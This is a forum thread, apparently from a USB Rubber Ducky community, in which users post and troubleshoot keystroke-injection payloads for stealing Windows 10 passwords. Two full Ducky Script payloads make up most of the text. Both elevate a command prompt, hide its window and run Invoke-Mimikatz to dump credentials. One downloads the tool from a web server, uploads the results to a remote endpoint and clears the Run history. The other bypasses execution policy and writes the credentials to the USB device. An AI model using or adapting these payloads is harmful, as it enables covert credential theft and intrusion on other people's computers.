[Windows 10 password grab.]

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):

DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER

I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

[Mr Robot Hack]

On 9/14/2016 at 2:50 PM, EvilTtaM said:

I attached the Ducky Code I used, If there are any suggestions for changes please let me know. I will add that this code assumes that the executionpolicy is set to bypass, however it could be written in to change that. 

15secondhack.txt

Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?

[Mr. Robot Hack (optimized payload)]

On 10/26/2016 at 3:39 AM, 0x41414141 said:

Here's a version for the Twin Duck.  Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.

DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
ENTER
DELAY 500
STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
ENTER

 

I ran it together with the correct im.ps1 on a Windows 10 machine(yes my usb is named 'DUCK'). Commands ran properly until the last STRING I think then the powershell session just did nothing and hanged on the last string. A file was never created so I am assuming mimikatz didn't even run. Could it be the case sensivity in ' do @set duck=%d' and %duck%? I have the feeling the last IF isn't executed because it is returned False.